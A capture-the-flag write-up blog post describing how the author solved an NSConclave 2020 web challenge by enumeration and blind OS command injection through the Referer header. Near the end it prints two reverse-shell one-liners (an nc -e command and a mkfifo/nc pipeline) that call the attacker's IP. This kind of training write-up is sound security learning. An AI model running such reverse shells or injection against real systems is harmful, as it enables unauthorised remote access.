January 31, 2020 (2 to 3 PM)
Hi! I am Bipin Jitiya, working as security analyst at Net Square Solutions Pvt. Ltd. In this post I am writing about a CTF which was organized as a part of the NSConclave 2020 event. Unfortunately I did not play on the day of the event. Many challenges were solved by several players, but none were able to solve one challenge, which was later hosted as #CTFFriday.
This CTF was built by Bhargav Gajera and organized by Net Square Solutions Pvt. Ltd. and NSConclave on January 31, 2020. So the following is my detailed write-up on how I solved that challenge.
The task name was WEB, where only one URL was provided. As the name suggests, a web application was hosted at the mentioned URL.
I started with the general web application testing approach. I crawled all the web pages, and started looking for any hints in the HTML and JavaScript comments (in source code).
I also checked robots.txt for files and directories hidden from search engines, but that file does not exist on the target server. After all the analysis, I noticed that there is a page parameter that changes its value when navigating to a different page. I quickly tested this for Directory traversal vulnerability using some standard payloads but no success.
As usual, when I don't get anything, I start enumeration. This time also I launched a dictionary based attack against the web server. I simply started brute force directories and files in websites using intruder. Obviously we can do this using the dirb and dirsearch tools. Some CTF challenges also have hints in the "404 Not Found" page, dirb and dirsearch may not mark those webpages at that time. I did not want to leave any stone unturned. As a result I got a sitemap.xml file. It contains an URL entry https://www.127.0.0.1/index.php?page=admin
When I opened that URL from the browser, it automatically redirected me to the homepage. This seemed interesting, I intercepted the same request in burp and started the weird test by adding some extra parameters like username and password, started fuzz on those parameters with random payloads, but to no effect.
The response contains the string "log:" so added a new Log header with a random string as the value, but again no effect.
After wasting a lot of time on that, I felt that the response user requesting from might be some kind of hint.
I thought user requesting from means the previous web page from which a link to the currently requested page was followed. That process is done by the Referer request header. I quickly added a Referer request header and its value was reflected back into the response body.
After fuzzing on the Referer request header, I found that it was vulnerable to blind OS command injection. I tried to get the reverse shell using the following command:
root@ns:~# nc -e /bin/sh 192.168.43.101 7171
It was not connecting. I thought there might be some problem with nc. I remembered a post about how to get reverse shell when wrong version of netcat is installed. I got the reverse shell using following payload:
root@ns:~# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1192.168.43.101 7171 >/tmp/f
It worked! I got the flag after executing some commands!
Thanks for reading. Keep learning.
Stay safe and healthy 😇